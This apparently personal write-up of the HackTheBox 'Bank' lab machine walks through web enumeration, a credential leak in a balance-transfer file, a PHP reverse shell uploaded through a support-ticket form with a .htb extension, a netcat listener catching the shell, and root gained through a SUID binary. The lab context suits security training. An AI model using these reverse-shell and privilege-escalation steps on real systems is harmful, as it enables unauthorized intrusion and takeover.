HackTheBox - Bank

03 Apr 2025

Bank is a relatively simple machine, however proper web enumeration is key to finding the necessary data for entry. There also exists an unintended entry method, which many users find before the correct data is located.

Bank

Reconnaissance and Enumeration

I started with a typical nmap scan -sC for default scripts, -sV to show version, -O for OS detection and -T5 to speed up scan

┌──(vq4s㉿kali)-[~/Downloads]
└─$ nmap -sC -sV -O -T5 bank.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-02 23:58 CEST
Nmap scan report for bank.htb (10.10.10.29)
Host is up (0.032s latency).
rDNS record for 10.10.10.29: Bank.htb
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-title: HTB Bank - Login
|_Requested resource was login.php
Aggressive OS guesses: Linux 3.10 - 4.11 (95%), Linux 3.13 (95%), Linux 3.13 or 4.2 (95%), Linux 4.2 (95%), Linux 4.4 (95%), Linux 3.16 (94%), Linux 3.16 - 4.6 (94%), Linux 3.12 (93%), Linux 3.18 (93%), Linux 3.2 - 4.9 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.58 seconds

Standard login page, I didn’t find anything usefull in source view banklogin

Gobuster to enumerate directories on web server.

┌──(vq4s㉿kali)-[~/Downloads]
└─$ gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://bank.htb          
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://bank.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/uploads              (Status: 301) [Size: 305] [--> http://bank.htb/uploads/]
/assets               (Status: 301) [Size: 304] [--> http://bank.htb/assets/]
/inc                  (Status: 301) [Size: 301] [--> http://bank.htb/inc/]
/server-status        (Status: 403) [Size: 288]
/balance-transfer     (Status: 301) [Size: 314] [--> http://bank.htb/balance-transfer/]
Progress: 220559 / 220560 (100.00%)
===============================================================
Finished
===============================================================

upload assets inc

These directories contain standard PHP, JavaScript, and theme files. The /balance-transfer/ path was more interesting:

banktransfers In /balance-transfer, I found a large list of files. Most looked similar, but one file was noticeably smaller in size. banktrasnferacc

ourgoodacc It contained a failed encryption error that exposed plaintext credentials. I used those to successfully log in.

logintobank Logged in as Christos Christopoulos, I didn’t find anything interesting in the source view — so I decided to check the support page.

Exploitation

support On the support page, users could attach image files to tickets. While inspecting the source code, I found an HTML comment mentioning support for .htb file extensions — a valuable hint that files with this extension might be accepted, even if they weren’t images.

supportdevtools I created a PHP reverse shell (PentestMonkey) and uploaded it with a .htb extension. succuploadphp I set up a listener and triggered the shell using the “Click here” button: workingshell

┌──(vq4s㉿kali)-[~/Downloads]
└─$ nc -lvnp 4242
listening on [any] 4242 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.29] 41136
Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux
 01:40:30 up 43 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Logged as www-data, I spawned proper TTY using bash -i, then navigate to home directory to retrieve user flag:

$ bash -i
bash: cannot set terminal process group (1072): Inappropriate ioctl for device
bash: no job control in this shell
www-data@bank:/$ ls -la /home
ls -la /home
total 12
drwxr-xr-x  3 root  root  4096 Jan 11  2021 .
drwxr-xr-x 22 root  root  4096 Jan 11  2021 ..
drwxr-xr-x  3 chris chris 4096 Jan 11  2021 chris
www-data@bank:/$ wc /home/chris/user.txt
wc /home/chris/user.txt
 1  1 33 /home/chris/user.txt

Privilege Escalation

I first checked for sudo permissions

www-data@bank:/$ sudo -l
sudo -l
sudo: no tty present and no askpass program specified

No permissions, so i checked for SUID binaries, You can search that by following commands:

find / -user root -perm -4000 -print 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -perm -u=s 2>/dev/null | xargs ls -l
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

www-data@bank:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/var/htb/bin/emergency
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/mtr
/usr/sbin/uuidd
/usr/sbin/pppd
/bin/ping
/bin/ping6
/bin/su
/bin/fusermount
/bin/mount
/bin/umount
www-data@bank:/$ cd /var/htb/bin
cd /var/htb/bin
www-data@bank:/var/htb/bin$ ls -la 
ls -la 
total 120
drwxr-xr-x 2 root root   4096 Jan 11  2021 .
drwxr-xr-x 3 root root   4096 Jan 11  2021 ..
-rwsr-xr-x 1 root root 112204 Jun 14  2017 emergency
www-data@bank:/var/htb/bin$ ./emergency
./emergency
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)                                                                                                                   

The emergency binary was owned by root and had the SUID bit set. Executing it successfully elevated privileges to root, allowing me to access the final flag.

wc /root/root.txt
 1  1 33 /root/root.txt